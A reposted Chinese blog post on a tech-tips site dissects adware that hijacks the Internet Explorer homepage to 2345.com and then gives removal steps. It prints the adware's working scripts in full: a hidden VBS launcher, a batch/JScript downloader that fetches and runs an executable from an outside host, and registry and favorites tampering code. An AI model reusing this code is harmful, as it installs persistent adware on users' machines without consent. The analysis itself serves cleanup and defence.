电脑技巧.图片新闻 | 用户注册 | 用户中心 | 发表文章 | 留言簿 | 二维码
  |繁体中文|  RSS订阅 |极速版  |扫描二维码  
电脑技巧,计算机,电脑知识,组装维修,经验,资料精华宝库,HUGESKY CMS官网,鸿天全站,HUGESKY-干掉臭名昭著的流氓2345.com篡改,行不?(1)
本站申明:
本站尽量纯净无广告,提供交流学习类共享资料。[广告投放说明] [联系]
  • 首 页
  • 电脑知识
  • 应用技巧
  • 组装技巧
  • 维修技巧
  • 网络技巧
  • 组网通信
  • 办公技巧
  • 技巧视频
  • 编程技巧
  • 防毒技巧
  • 博客圈
会员注册关闭
帐号: 密码: 验证码: 点击显示验证码 记住
电脑技巧 -> 防毒技巧 -> 网络安全

干掉臭名昭著的流氓2345.com篡改,行不?(1)

作者: 未知 来源: 网络收集 整理日期: 2019-11-25
推荐指数: 点击:2185   文字大小: 加入收藏夹

    导  读:干掉臭名昭著的流氓2345.com篡改,行不?(1),文章来源:https://blog.csdn.net/qq_25870113/article/details/43985343?locationNum=1&fps=1

 主页给改成了臭名昭著的2345.com,开始没在意:改了就改了吧,我再改回来吧。


    当然,直接把主页改成about:blank肯定是没戏的,不过我也试了一下:万一好使呢?虽然结果不出所料的不好使。


    再看一眼360安全卫士的锁定主页——居然还是空白页!解开锁定再锁定上也没用,这不得不说是360失败的地方……


    不过这样也确定了,那就是流氓插件绑定的问题了。这个时候如果去注册表说不定会好使,不过有了360,那就用360清理插件吧,我也懒得自己去找注册表……【附:注册表关于IE主页的键值:HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain中的StartPage,直接修改成想要的主页就可以】
    清理之后,不出所料有一个差评插件,清理之!之后按照提示重启
    可是重启之后发现:NANI?还是不好使?再次清理之!这次就不要重启了,这时发现:主页已经被改回到正常的空白页了,说明360的清理是有效的,可是为什么重启之后又回来了呢?这个时候就可以确定,这家伙在启动项里做了手脚。WIN(就是键盘上那个微软的标志,一按会拉开开始菜单的那个按键)+R,输入msconfig,查看启动项:
    发现他了!一个叫做kqidong.lnk的启动项,目标指向C:PROGR~1qidongqidong.vbs,这里就要解释一下:如果用过DOS(不是那个CMD批处理,就是DOS系统)的童鞋都会知道,当一个文件夹在电脑中的名字太长时,就会显示为“前几个字母+~+数字编号”的形式,这样目标就确定了:C:Program Filesqidongqidong.vbs这个时候其实问题就算是解决了,把这个文件夹C:Program Filesqidong删除肯定就没问题了,可是拥有求知欲的人永远是蛋疼的,我点了进去:
    因为我的电脑设置成了不隐藏系统文件和显示所有文件和文件夹,所以我很轻松的看到了里面所包含的东西:kqidong.zip、qidong.bat、qidong.exe、qidong.vbs、xiazai.bat,其中qidong.exe是winrar 自解压格式,正好我也懒得反编译;我只扫了一眼就确定了:这个东东一定是国人弄得!(因为用的是汉语拼音……)


先查看那个qidong.vbs,用记事本看看他源码:右键——编辑,发现了里面的内容只有短短三行:


set Cleaner=createobject("wscript.shell")
Cleaner.run "qidong.bat",vbhide
Cleaner.run "xiazai.bat",vbhide

    这三行代码的意思仅仅是在隐藏窗体的情况下运行qidong.bat和xiazai.bat两个批处理文件,那再看看这两个的源码吧,先是xiazai.bat,同样右键——编辑:

echo=1/*>nul&@cls
@echo off
call :http "http://www.jinrong800.com/baiduguangjia/qidong/qidong.exe" "C:Program Files"qidongqidong.exe"
@echo
start "" "C:Program Files"qidongqidong.exe
:http
echo Source:      "%~1"
echo Destination: "%~f2"
echo Start downloading. . .
cscript -nologo -e:jscript "%~f0" "%~1" "%~2"
echo OK!
goto :eof
*/
var iLocal,iRemote,xPost,sGet;
iLocal =WScript.Arguments(1); 
iRemote = WScript.Arguments(0); 
iLocal=iLocal.toLowerCase();
iRemote=iRemote.toLowerCase();
xPost = new ActiveXObject("Microsoft"+String.fromCharCode(0x2e)+"XMLHTTP");
xPost.Open("GET",iRemote,0);
xPost.Send();
sGet = new ActiveXObject("ADODB"+String.fromCharCode(0x2e)+"Stream");
sGet.Mode = 3;
sGet.Type = 1; 
sGet.Open(); 
sGet.Write(xPost.responseBody);
sGet.SaveToFile(iLocal,2); 

    看不懂?没关系!联系那个文件名和几个网址和地址我们就可以断定:这是用来下载那个自解压文件并解压的,那我们去看看那个自解压文件qidong.exe:右键——用Winrar打开,里面仅仅有着一个qidong.bat,在右面提示着

;下面的注释包含自解压脚本命令

Silent=1
Overwrite=1

    这里我解释一下:Silent=1是静默状态下解压,不会弹出窗口,而Overwrite=1是如果有同名文件直接替换,保证了不会弹出:“XXX已经存在,是否覆盖”之类的提示来告诉你他在运行。
    那么接下来看看qidong.bat,同样“右键——编辑”,可这次就不那么顺利了:里面全是乱码,这怎么办呢?还好我有神器:Notepad++,右键——Edit with Notepad++(UE当然也可以做到同样的事情),这次他就无处躲藏了,请看源码:

%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a 
cls
::设置主页并锁定
@REG ADD "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand" /ve /t REG_EXPAND_SZ /d "C:Program FilesInternet Exploreriexplore.exe http://www.2345.com/?10688" /f   
@reg add "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain" /v "Start Page" /d "http://www.2345.com/?10688" /f   

::添加快捷方式到收藏夹
@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k2345网址导航.url&echo URL="http://www.2345.com/?10688" >>%%k2345网址导航.url&del /f /s /q %Temp%Favorites.txt>nul
)

@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k什么电影都能搜索-你懂的.url&echo URL="http://www.ks888.net" >>%%k什么电影都能搜索-你懂的.url&del /f /s /q %Temp%Favorites.txt>nul
)


@echo off&setlocal enabledelayedexpansion
REG QUERY "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders" /v Favorites >%Temp%Favorites.txt
for /f "skip=2 tokens=1,2*" %%i in ('find /i "Favorites" %Temp%Favorites.txt') do (
echo [InternetShortcut] >>%%k1淘宝热卖.url&echo URL="http://www.taobao.com/go/chn/tbk_channel/channelcode.php?pid=mm_10836206_0_0&eventid=101329" >>%%k1淘宝热卖.url&del /f /s /q %Temp%Favorites.txt>nul
)

    居然连注释都有……这流氓软件的作者还真可爱,正好也省去了多费口舌解释,这样通过开机启动项里面运行的qidong.vbs,即使文件被360干掉了他也能保证每次开机都重新缠上你,果然是“臭牛氓”!
    而那个kqidong.zip中装的就是kqidong.lnk则是最开始启动项里面的那个,直接指向C:Program Filesqidongqidong.vbs
    至此我们已经完整的掌握了这个万恶的2345.com的流氓团伙的信息,可以直接干掉他了!
    通过随便一个清理插件的工具清理掉插件、之后打开msconfig,ban掉kqidong.lnk这个启动项,再把C盘Program Files下的qidong文件夹删除,这个臭牛氓就被彻底的请出电脑了!不过记得最后一步:把主页改回来,最好去上面给出了注册表项里面查看一下Startpage,是不是已经改过来了,如果没改过来就处理一下吧。

获得更多 -> 防毒技巧 -> 网络安全
技术支持

责任编辑: webmaster >>> 百度上搜索  谷歌上搜索

hugesky
点击复制本连接 (http://www.hugesky.com/showarticle.php?id=6963)

  转换为打印版本   在本站发表文章    关闭本页窗口
 手机运行内存4+64g 与 6+64g 使用有多大不同
 干掉臭名昭著的流氓2345.com篡改,累不?(2)

>>> 相关资讯:

  • . 详解三类典型钓鱼手法
  • . [推荐]五步搞定电脑网络安全五步防止
  • . 发现目录开启了可执行文件运行权限解
  • . 保护内网安全九大步骤
  • . 网站关键词标题描述不一致,是否被劫
  • . 各种劫持DNSISP联通电信劫持如何清除
  • . SQL注入取得网站路径
  • . 电脑安全防护7种武器
  • . [图文]关闭135/139/445端口
  • . 黑客是如何用公共WiFi套取个人信息如
【声明】:
以上文章或资料除注明为电脑技巧原创或编辑整理外,均为网络收集整理或网友推荐。以上内容以共享、参考、研究为目的,不存在任何商业目的。
未注明作者或出处的文章,可能资料来源不规范。如有涉及版权请给予及时联系更正或予以删除。
评论:(开放)

  网友评论: 评  
以下网友评论只代表网友个人观点,不代表本站观点
  发表评论:(匿名用户不能发表评论! 注册 登陆)
昵称: 验证码:
评分:
5 4 3 2 1
内容:
  请文明参与讨论,禁止漫骂攻击。
 
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任.
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据.
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为.
内容搜索
    • 站内搜索
热门资讯
  • [图文]来,来,来,火绒剑干掉Aliba...
  • 公共DNS服务器IP地址大全
  • 电脑快捷键全都在这了!电脑技巧...
  • 图说最常用的10个电脑技巧
  • 别说你不会?这9个电脑技巧你必须...
  • Win7解决C盘占用空间大的方法
  • 网银密码设置小技巧
  • win7安装AHCI驱动
  • [推荐]五步搞定电脑网络安全 五步...
  • 平板电脑选购六大要点
广告位置
开启模板:NEWSKY -关于版权 - 隐私保护 - 联系我们 - 网站地图 - 会员列表 - 加入收藏 - 返回顶部

我问佛:如何才能如你般睿智? 佛曰:佛是过来人,人是未来佛。
部分资源收集于互联网并遵循 署名-非商业性使用-相同方式共享3.0共享,尽量署名原创。
据《信息网络传播权保护条例》 如侵犯您的权利,请联系webmaster(at)hugesky.com删除。
Power By HugeSky.Com

Copyright© www.hugesky.com
Powered by HUGESKY CMS 7.1.1.1080918 professional licensed